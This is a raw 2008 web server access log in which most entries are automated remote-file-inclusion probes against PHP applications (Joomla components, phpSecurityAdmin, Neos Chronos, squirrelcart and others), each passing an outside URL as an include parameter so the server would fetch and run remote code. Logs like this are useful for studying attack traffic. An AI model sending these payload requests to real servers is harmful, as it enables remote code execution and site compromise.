62.128.1.35 - - [07/May/2008:08:46:37 -0500] "GET /errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.128.1.35 - - [07/May/2008:08:47:10 -0500] "GET /logs/errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.128.1.35 - - [07/May/2008:08:47:10 -0500] "GET /errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
83.190.16.153 - - [07/May/2008:08:48:53 -0500] "GET //oneadmin/common/include.php?path[docroot]=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
83.190.16.153 - - [07/May/2008:08:48:53 -0500] "GET /logs//oneadmin/common/include.php?path[docroot]=http://th3m3.awardspace.com/help01.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
208.116.44.68 - - [07/May/2008:08:50:22 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
208.116.44.68 - - [07/May/2008:08:50:23 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
67.19.61.90 - - [07/May/2008:08:50:47 -0500] "GET /logs/access_log.1207785600/mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
67.19.61.90 - - [07/May/2008:08:50:47 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
67.19.61.90 - - [07/May/2008:08:50:47 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
67.19.61.90 - - [07/May/2008:08:50:48 -0500] "GET /logs/access_log.1207180800/mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
213.246.51.45 - - [07/May/2008:08:52:49 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
213.246.51.45 - - [07/May/2008:08:52:49 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.179.65.3 - - [07/May/2008:08:53:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit (KHTML, like Gecko)"
200.179.65.3 - - [07/May/2008:08:53:54 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://www.answers.com/topic/costume-design?cat=entertainment""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit (KHTML, like Gecko)"
74.6.26.97 - - [07/May/2008:08:54:19 -0500] "GET /logs/access_log.1169942400 HTTP/1.0" 200 125450 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.178.176.36 - - [07/May/2008:08:57:06 -0500] "GET /logs/errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
66.178.176.36 - - [07/May/2008:08:57:06 -0500] "GET /errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.6.20.184 - - [07/May/2008:09:06:28 -0500] "GET /logs/access_log.1188518400 HTTP/1.0" 200 182750 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.246.51.45 - - [07/May/2008:09:06:55 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
213.246.51.45 - - [07/May/2008:09:06:56 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.90.72.88 - - [07/May/2008:09:07:18 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://cocreation.hk/id? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
69.90.72.88 - - [07/May/2008:09:07:18 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://cocreation.hk/id? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
202.153.128.112 - - [07/May/2008:09:12:49 -0500] "GET /logs/access_log.1207785600/mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
202.153.128.112 - - [07/May/2008:09:12:49 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
202.153.128.112 - - [07/May/2008:09:12:50 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
202.153.128.112 - - [07/May/2008:09:12:53 -0500] "GET /logs/access_log.1207180800/mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
74.6.12.57 - - [07/May/2008:09:13:56 -0500] "GET /logs/access_log.1184630400 HTTP/1.0" 200 143753 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.208.165.244 - - [07/May/2008:09:14:18 -0500] "GET /logs/access_log.1207785600/200http://www.grantshotel-harrogate.com/styles/sistem.txt? HTTP/1.1" 404 368 "-""libwww-perl/5.803"
213.208.165.244 - - [07/May/2008:09:14:19 -0500] "GET /200http://www.grantshotel-harrogate.com/styles/sistem.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
213.208.165.244 - - [07/May/2008:09:14:19 -0500] "GET /logs/200http://www.grantshotel-harrogate.com/styles/sistem.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
121.88.4.5 - - [07/May/2008:09:14:27 -0500] "GET /logs/access_log.1204761600/appserv/main.php?appserv_root=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
121.88.4.5 - - [07/May/2008:09:14:28 -0500] "GET /appserv/main.php?appserv_root=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
121.88.4.5 - - [07/May/2008:09:14:28 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
74.6.28.169 - - [07/May/2008:09:19:05 -0500] "GET /logs/access_log.1200787200 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.169 - - [07/May/2008:09:19:06 -0500] "GET /logs/access_log.1201305600 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.225.246.28 - - [07/May/2008:09:20:44 -0500] "GET /logs/access_log.1207785600/mygallery/myfunctions/mygallerybrowser.php?myPath=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
121.88.4.5 - - [07/May/2008:09:22:43 -0500] "GET /logs/access_log.1207180800/appserv/main.php?appserv_root=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
74.6.18.167 - - [07/May/2008:09:23:25 -0500] "GET /logs/access_log.1202860800 HTTP/1.0" 200 386801 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.90.72.88 - - [07/May/2008:09:27:42 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://cocreation.hk/id? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
69.90.72.88 - - [07/May/2008:09:27:50 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://cocreation.hk/id? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
216.32.85.218 - - [07/May/2008:09:28:13 -0500] "GET /logs/access_log.1207785600/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dokoiku.jp/master/zip_code/tools/pro/temp.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:09:31:50 -0500] "GET /logs/index.php?pagina1ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:09:31:50 -0500] "GET /index.php?pagina1ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
62.128.1.35 - - [07/May/2008:09:31:57 -0500] "GET /logs/access_log.1207180800/errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
62.128.1.35 - - [07/May/2008:09:31:57 -0500] "GET /errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.128.1.35 - - [07/May/2008:09:31:57 -0500] "GET /logs/errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
217.67.26.84 - - [07/May/2008:09:32:50 -0500] "GET /logs/index.php?pagina1ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:09:32:51 -0500] "GET /index.php?pagina1ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.128.1.35 - - [07/May/2008:09:32:53 -0500] "GET /logs/access_log.1207180800/errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
62.128.1.35 - - [07/May/2008:09:32:54 -0500] "GET /errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.128.1.35 - - [07/May/2008:09:32:54 -0500] "GET /logs/errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
217.67.26.84 - - [07/May/2008:09:33:37 -0500] "GET /logs/index.php?pagina1ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:09:33:37 -0500] "GET /logs/index.php?pagina1ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:09:33:37 -0500] "GET /index.php?pagina1ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:09:33:38 -0500] "GET /index.php?pagina1ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.29.81.233 - - [07/May/2008:09:33:59 -0500] "GET /logs/index.php?pagina1ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:09:33:59 -0500] "GET /index.php?pagina1ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:09:35:35 -0500] "GET /logs/index.php?pagina1ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:09:35:36 -0500] "GET /index.php?pagina1ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
217.67.26.84 - - [07/May/2008:09:38:31 -0500] "GET /logs/index.php?pagina1ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:09:38:31 -0500] "GET /index.php?pagina1ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.6.19.229 - - [07/May/2008:09:39:50 -0500] "GET /logs/access_log.1183420800 HTTP/1.0" 200 197762 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.17.3.183 - - [07/May/2008:09:40:13 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.freewebs.com/haddem/test.txt? HTTP/1.1" 404 313 "-""Microsoft Pocket Internet Explorer/0.6"
85.17.3.183 - - [07/May/2008:09:40:13 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.freewebs.com/haddem/test.txt? HTTP/1.1" 404 308 "-""Microsoft Pocket Internet Explorer/0.6"
89.255.60.225 - - [07/May/2008:09:43:09 -0500] "GET /logs/access_log.1207180800/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://robubu.com/calendar/ws/KaBo.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
89.255.60.225 - - [07/May/2008:09:43:10 -0500] "GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://robubu.com/calendar/ws/KaBo.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
89.255.60.225 - - [07/May/2008:09:43:10 -0500] "GET /logs/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://robubu.com/calendar/ws/KaBo.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
85.17.138.13 - - [07/May/2008:09:43:42 -0500] "GET /logs/phpsecurityadmin/include/logout.php?PSA_PATH=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
85.17.138.13 - - [07/May/2008:09:43:42 -0500] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
74.6.19.216 - - [07/May/2008:09:46:01 -0500] "GET /logs/access_log.1177891200 HTTP/1.0" 200 140836 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.225.192.249 - - [07/May/2008:09:46:11 -0500] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
66.225.192.249 - - [07/May/2008:09:46:11 -0500] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
212.34.153.42 - - [07/May/2008:09:46:24 -0500] "GET /logs//request_type.php?mosConfig_absolute_path=http://www.guardmusic.com/echo.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
212.34.153.42 - - [07/May/2008:09:46:25 -0500] "GET //request_type.php?mosConfig_absolute_path=http://www.guardmusic.com/echo.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
85.17.3.183 - - [07/May/2008:09:48:28 -0500] "GET //Neos_Chronos/header.php?base_folder=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
207.195.169.18 - - [07/May/2008:09:49:40 -0500] "GET /logs/access_log.1204761600/appserv/main.php?appserv_root=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
207.195.169.18 - - [07/May/2008:09:49:40 -0500] "GET /appserv/main.php?appserv_root=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
207.195.169.18 - - [07/May/2008:09:49:40 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
85.17.3.183 - - [07/May/2008:09:49:51 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
85.17.3.183 - - [07/May/2008:09:49:51 -0500] "GET //Neos_Chronos/header.php?base_folder=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
84.40.22.92 - - [07/May/2008:09:51:27 -0500] "GET //stubjambo.php?baseDir=http://www.guardmusic.com/echo.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.195.169.18 - - [07/May/2008:09:52:39 -0500] "GET /logs/access_log.1207180800/appserv/main.php?appserv_root=http://www.fingerxs.eu//images/paddy?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
74.6.9.122 - - [07/May/2008:09:53:58 -0500] "GET /logs/access_log.1159228800 HTTP/1.0" 200 302224 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.227.217.220 - - [07/May/2008:09:55:47 -0500] "GET /logs/errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
216.227.217.220 - - [07/May/2008:09:55:47 -0500] "GET /errors.php?error=http://caloteiros.iespana.es/xa.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
58.26.137.64 - - [07/May/2008:09:58:11 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://medisana.co.kr/test?? HTTP/1.1" 404 313 "-""libwww-perl/5.69"
58.26.137.64 - - [07/May/2008:09:58:12 -0500] "GET //Neos_Chronos/header.php?base_folder=http://medisana.co.kr/test?? HTTP/1.1" 404 308 "-""libwww-perl/5.69"
89.111.176.28 - - [07/May/2008:10:02:42 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.111.176.28 - - [07/May/2008:10:02:43 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
58.26.137.64 - - [07/May/2008:10:05:07 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test?? HTTP/1.1" 404 325 "-""libwww-perl/5.69"
58.26.137.64 - - [07/May/2008:10:05:08 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test?? HTTP/1.1" 404 320 "-""libwww-perl/5.69"
72.29.81.233 - - [07/May/2008:10:05:45 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:10:05:45 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
61.115.228.135 - - [07/May/2008:10:11:27 -0500] "GET /logs/access_log.1207180800//Neu/html/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.803"
61.115.228.135 - - [07/May/2008:10:11:27 -0500] "GET //Neu/html/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
61.115.228.135 - - [07/May/2008:10:11:27 -0500] "GET /logs//Neu/html/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
72.29.81.233 - - [07/May/2008:10:15:50 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:10:15:50 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:10:16:03 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
72.29.81.233 - - [07/May/2008:10:16:03 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
74.6.21.232 - - [07/May/2008:10:19:58 -0500] "GET /costume/thmb4.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.225.192.249 - - [07/May/2008:10:23:14 -0500] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
66.225.192.249 - - [07/May/2008:10:23:14 -0500] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
74.6.21.239 - - [07/May/2008:10:28:55 -0500] "GET /logs/access_log.1156464000 HTTP/1.0" 200 214622 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.210.31.3 - - [07/May/2008:10:30:39 -0500] "GET /logs/access_log.1185321600/index.php?channel=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
82.210.31.3 - - [07/May/2008:10:30:40 -0500] "GET /index.php?channel=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
82.210.31.3 - - [07/May/2008:10:30:40 -0500] "GET /logs/index.php?channel=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
66.225.192.249 - - [07/May/2008:10:32:18 -0500] "GET /logs/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
66.225.192.249 - - [07/May/2008:10:32:18 -0500] "GET /components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
217.67.26.84 - - [07/May/2008:10:37:11 -0500] "GET /logs/index.php?pagina1ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:10:37:11 -0500] "GET /logs/index.php?pagina1ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:10:37:11 -0500] "GET /index.php?pagina1ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:10:37:12 -0500] "GET /index.php?pagina1ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.75.158.23 - - [07/May/2008:10:42:49 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.69"
62.75.158.23 - - [07/May/2008:10:42:50 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.69"
64.128.80.102 - - [07/May/2008:10:46:48 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
64.128.80.102 - - [07/May/2008:10:46:49 -0500] "GET //skin/zero_vote/error.php?dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
64.128.80.102 - - [07/May/2008:10:46:49 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
64.128.80.102 - - [07/May/2008:10:46:53 -0500] "GET /logs/access_log.1207180800//skin/zero_vote/error.php?dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
84.16.224.119 - - [07/May/2008:10:49:03 -0500] "GET /logs/access_log.1207180800///squirrelcart/cart_content.php?cart_isp_root=http://www.kulturystyka.org.pl/modules/xoopstube/images/robots.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
84.16.224.119 - - [07/May/2008:10:49:03 -0500] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.kulturystyka.org.pl/modules/xoopstube/images/robots.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
84.16.224.119 - - [07/May/2008:10:49:03 -0500] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.kulturystyka.org.pl/modules/xoopstube/images/robots.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
89.149.208.203 - - [07/May/2008:10:56:07 -0500] "GET /logs/access_log.1207180800///squirrelcart/cart_content.php?cart_isp_root=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
89.149.208.203 - - [07/May/2008:10:56:07 -0500] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
89.149.208.203 - - [07/May/2008:10:56:08 -0500] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
74.6.9.56 - - [07/May/2008:10:58:56 -0500] "GET /logs/access_log.1180569600 HTTP/1.0" 200 232732 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
219.79.235.86 - - [07/May/2008:10:59:11 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://hk.search.yahoo.com/search?p=www.pconline.com&fr=FP-tab-web-t&ei=UTF-8&meta=rst%3Dhk""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ezPeer+ v1.0 (0.5.0.62); .NET CLR 1.1.4322)"
202.60.74.190 - - [07/May/2008:11:00:19 -0500] "GET /logs/access_log.1207180800///squirrelcart/cart_content.php?cart_isp_root=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
202.60.74.190 - - [07/May/2008:11:00:20 -0500] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
202.60.74.190 - - [07/May/2008:11:00:20 -0500] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
207.218.248.94 - - [07/May/2008:11:02:00 -0500] "GET /logs/index.php?channel=http://www.mariosoucy.com/voicefiles/test1.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
207.218.248.94 - - [07/May/2008:11:02:02 -0500] "GET /index.php?channel=http://www.mariosoucy.com/voicefiles/test1.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
74.6.24.254 - - [07/May/2008:11:07:21 -0500] "GET /logs/access_log.1165449600 HTTP/1.0" 200 207369 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.7.165 - - [07/May/2008:11:09:25 -0500] "GET /logs/access_log.1201996800 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.17.3.183 - - [07/May/2008:11:11:38 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
85.17.3.183 - - [07/May/2008:11:11:38 -0500] "GET //Neos_Chronos/header.php?base_folder=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
85.17.3.183 - - [07/May/2008:11:11:39 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
85.17.3.183 - - [07/May/2008:11:11:39 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
208.116.44.68 - - [07/May/2008:11:16:08 -0500] "GET /logs/access_log.1207180800//errors.php?error=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
208.116.44.68 - - [07/May/2008:11:16:09 -0500] "GET //errors.php?error=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.812"
